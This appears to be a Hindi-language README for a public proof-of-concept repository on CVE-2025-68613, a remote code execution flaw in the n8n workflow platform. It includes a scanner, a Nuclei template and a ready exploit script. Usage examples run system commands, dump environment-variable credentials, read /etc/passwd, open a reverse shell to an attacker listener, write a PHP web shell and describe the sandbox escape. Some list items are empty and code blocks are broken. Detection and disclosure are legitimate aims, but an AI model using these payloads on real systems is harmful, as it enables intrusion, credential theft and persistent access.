
CVE-2025-68613 के लिए सार्वजनिक PoC + स्कैनर और शोध: n8n वर्कफ़्लो ऑटोमेशन में एक्सप्रेशन इंजेक्शन के माध्यम से क्रिटिकल RCE (CVSS 10.0)। इसमें डिटेक्शन टूल, पूर्ण एक्सप्लॉइट और सुधार मार्गदर्शन शामिल हैं।

CVE-2025-68613 एक गंभीर रिमोट कोड निष्पादन (RCE) भेद्यता है जो n8n में खोजी गई है, जो एक लोकप्रिय ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है। यह भेद्यता प्रमाणित उपयोगकर्ताओं को सर्वर पर मनमाना कोड निष्पादित करने की अनुमति देती है, जिससे संभावित रूप से पूरा सिस्टम समझौता हो सकता है।
n8n एक ओपन-सोर्स वर्कफ़्लो ऑटोमेशन प्लेटफ़ॉर्म है जो उपयोगकर्ताओं को अनुमति देता है:
संगठन n8n का उपयोग करते हैं:
आईटी बुनियादी ढांचे में यह केंद्रीय भूमिका भेद्यताओं को विशेष रूप से खतरनाक बनाती है, क्योंकि वे हमलावरों को पूरे नेटवर्क और संवेदनशील डेटा तक पहुंच प्रदान कर सकती हैं।
इस रिपॉजिटरी में भेद्यता का पता लगाने और शोषण परीक्षण के लिए उपयोग के लिए तैयार उपकरण शामिल हैं:
cve-2025-68613-scanner.pyउद्देश्य: कमजोर n8n इंस्टेंसेस का सुरक्षित, गैर-शोषणकारी पता लगाना
विशेषताएं:
उपयोग:```bash python3 cve-2025-68613-scanner.py -u http://target:5678
**आउटपुट**:
- निकास कोड 0: असुरक्षित नहीं
- निकास कोड 1: संस्करण अनिर्धारित (शायद पैच किया गया या छिपा हुआ)
- निकास कोड 2: असुरक्षित संस्करण पाया गया
### 2. न्यूक्ली टेम्पलेट: `CVE-2025-68613.yaml`
**उद्देश्य**: स्वचालित भेद्यता पता लगाना और बुनियादी अभिव्यक्ति मूल्यांकन परीक्षण
**विशेषताएं**:
- मान्य प्रमाणीकरण टोकन आवश्यक है
- अभिव्यक्ति इंजेक्शन क्षमता का परीक्षण करता है
- Node.js वैश्विक संदर्भ (process.platform) को पढ़ने का प्रयास करता है
- RCE वेक्टर को मान्य करने के लिए कार्यप्रवाह बनाता है
- CVSS 10.0 गंभीरता वर्गीकरण
**उपयोग**:```bash
# Single target with known token
nuclei -t CVE-2025-68613.yaml -u http://target:5678 -v
# Multiple targets
nuclei -t CVE-2025-68613.yaml -l targets.txt
exploit_cve-2025-68613.pyउद्देश्य: पूर्ण प्रमाण-सिद्धांत शोषण जिसमें कई आक्रमण पेलोड हैं
विशेषताएँ:
आवश्यकताएँ:
स्थापना:```bash pip install requests chmod +x exploit_cve-2025-68613.py
**उपयोग उदाहरण**:```bash
# Gather system information
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload info
# Execute system command (whoami)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload cmd --command "whoami"
# Extract all environment variables (credentials, API keys)
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload env
# Read sensitive files
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload read --file "/etc/passwd"
# Establish reverse shell (requires netcat listener)
# On attacker machine: nc -lvnp 4444
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload revshell --lhost 10.10.14.5 --lport 4444
# Write a web shell for persistence
python3 exploit_cve-2025-68613.py -u http://target:5678 \
-e [email protected] -p password --payload write \
--file "/tmp/shell.php" --content '<?php system($_GET["cmd"]); ?>'
यह कैसे काम करता है:
this.constructor.constructor() का उपयोग करके एक्सप्रेशन सैंडबॉक्स से बाहर निकलता हैprocess.platform या अन्य Node.js API के माध्यम से पेलोड को निष्पादित करता हैनिकास कोड:
सरल शब्दों में: n8n उपयोगकर्ताओं को डेटा को गतिशील रूप से संसाधित करने के लिए वर्कफ़्लो में एक्सप्रेशन लिखने की अनुमति देता है। हालाँकि, इन एक्सप्रेशनों का मूल्यांकन उचित सैंडबॉक्सिंग के बिना किया जाता है, जिससे हमलावर इच्छित निष्पादन संदर्भ से बाहर निकल सकते हैं और सर्वर पर मनमाना कोड चला सकते हैं।
जब आप n8n में एक वर्कफ़्लो बनाते हैं, तो आप डेटा में हेरफेर करने के लिए "एक्सप्रेशन" का उपयोग कर सकते हैं। ये एक्सप्रेशन एक प्रतिबंधित वातावरण में चलने वाले होते हैं। हालाँकि, भेद्यता से पता चलता है कि ये एक्सप्रेशन अंतर्निहित सिस्टम तक पहुँच सकते हैं, जिससे हमलावर निम्नलिखित कार्य कर सकते हैं: